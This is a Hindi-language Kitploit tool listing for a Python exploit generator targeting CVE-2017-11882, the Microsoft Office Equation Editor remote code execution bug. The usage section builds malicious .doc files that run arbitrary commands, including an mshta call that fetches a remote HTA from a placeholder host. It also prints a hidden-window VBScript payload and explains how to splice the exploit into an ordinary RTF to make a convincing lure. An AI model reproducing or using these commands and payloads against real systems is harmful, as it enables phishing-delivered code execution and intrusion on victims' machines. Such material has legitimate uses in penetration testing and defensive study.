Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-11882 — पायथन-आधारित एक्सप्लॉइट जनरेटर CVE-2017-11882 (माइक्रोसॉफ्ट ऑफिस इक्वेशन एडिटर रिमोट कोड एग्जीक्यूशन) के लिए, कस्टम शेलकोड और mshta पेलोड के लिए समर्थन के साथ, RTF/DOC फाइलों के माध्यम से। | Kitploit
उपकरण/GitHubGitHub/likekabin/cve-2017-11882
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHublikekabin/cve-2017-11882

CVE-2017-11882

पायथन-आधारित एक्सप्लॉइट जनरेटर CVE-2017-11882 (माइक्रोसॉफ्ट ऑफिस इक्वेशन एडिटर रिमोट कोड एग्जीक्यूशन) के लिए, कस्टम शेलकोड और mshta पेलोड के लिए समर्थन के साथ, RTF/DOC फाइलों के माध्यम से।

रिपॉजिटरी देखें
8 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-11882

43b मूल स्क्रिप्ट https://github.com/embedi/CVE-2017-11882 से है

109b मूल स्क्रिप्ट https://github.com/unamer/CVE-2017-11882/ से है (एक बार सराहना करें, अब unamer का कोड शेलकोड निष्पादित कर सकता है~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

उपयोग

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

mshta का उपयोग करें

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

43b कमांड की लंबाई 43 बाइट्स से अधिक नहीं हो सकती, 109b कमांड की लंबाई 109 बाइट्स से अधिक नहीं हो सकती

CVE-2017-11882 के लिए नमूना शोषण (पेलोड के रूप में calc.exe प्रारंभ करना)

example फ़ोल्डर में एक .rtf फ़ाइल है जो CVE-2017-11882 भेद्यता का शोषण करती है और सिस्टम में कैलकुलेटर चलाती है।

अनुकूलित सामग्री के बारे में

वास्तव में, अनुकूलित सामग्री का तरीका अन्य गुरुओं से सीखा गया था, बहुत पहले इसे एक स्क्रिप्ट के रूप में लिखा गया था, शुरू में इसे सार्वजनिक करने का इरादा नहीं था, लेकिन जब देखा कि समूह में किसी ने इसे पहले ही पोस्ट कर दिया है, तो कोई विकल्प नहीं था, इसे सार्वजनिक करना पड़ा। वास्तव में तरीका बहुत सरल है, बस एक सामान्य दस्तावेज़ rtf को टेक्स्ट फ़ाइल में खोलें, {*\datastore से पहले की सभी सामग्री को कॉपी करें, और {\object\objautlink\objupdate से पहले की सामग्री को बदलें, इसलिए इसे स्क्रिप्ट में लिखना बहुत आसान है।

अनुकूलित सामग्री जोड़ने का उपयोग, कोई भी स्क्रिप्ट चुनें:

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

अनुकूलित सामग्री input.rtf में है।

unamer के नवीनतम 605 बाइट शोषण स्क्रिप्ट के बारे में, इसे अपडेट नहीं किया जाएगा, रुचि हो तो स्वयं संशोधित करें।

टूल डाउनलोड करें